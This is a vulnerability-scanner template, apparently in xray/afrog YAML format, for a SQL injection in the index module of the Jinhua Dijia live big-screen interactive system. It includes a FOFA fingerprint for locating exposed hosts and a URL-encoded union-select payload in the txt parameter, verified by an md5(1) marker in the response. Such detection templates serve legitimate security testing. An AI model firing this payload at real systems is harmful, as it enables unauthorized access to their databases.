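Vulnerability description
The Jinhua Dijia live big-screen interactive system (金华迪加现场大屏互动系统) has a SQL injection vulnerability in index.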
fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
id: jinhuadijia-daping-index-sqli

info:
  name: 金华迪加现场大屏互动系统index存在SQL注入漏洞
  author: AVIC123
  severity: high
  verified: true
  description: |
    金华迪加现场大屏互动系统index存在SQL注入
    fofa:body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
  reference:
    - https://vip.bdziyi.com/58467/
  tags: jinhuadijia,daping,sqli
  created: 2025/08/20

set:
  hostname: request.url.host

rules:
  r0:
    request:
      method: GET
      path: /Modules/module.php?m=importlottery&c=admin&a=index&txt=%25%22%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%2c%33%2c%6d%64%35%28%31%29%2c%35%23
    expression: response.status == 200 && response.body.bcontains(b'c4ca4238a0b923820dcc509a6f75849b')
expression: r0()